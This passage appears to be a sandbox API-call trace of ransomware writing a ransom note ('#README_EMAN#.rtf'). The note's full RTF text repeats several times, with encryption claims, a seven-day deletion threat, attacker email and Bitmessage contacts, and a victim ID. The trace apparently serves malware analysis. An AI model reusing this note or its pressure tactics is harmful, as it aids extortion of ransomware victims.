butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nªV\x9a\x1d0Q²e\x02ï|O\x18·\x91\x0f\x92Î\x12µK\x16Õ3\x1e", lpUsedDefaultChar=0x0) returned 8717 [0269.776] WriteFile (in: hFile=0x284, lpBuffer=0x1ee8a78*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ee8a78*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0269.777] CloseHandle (hObject=0x284) returned 1 [0269.778] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\MF\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\mf\\#readme_eman#.rtf")) returned 0xffffffff [0269.778] GetLastError () returned 0x2 [0269.778] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\MF\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\mf\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0269.778] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.778] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.778] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ee8a78, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If 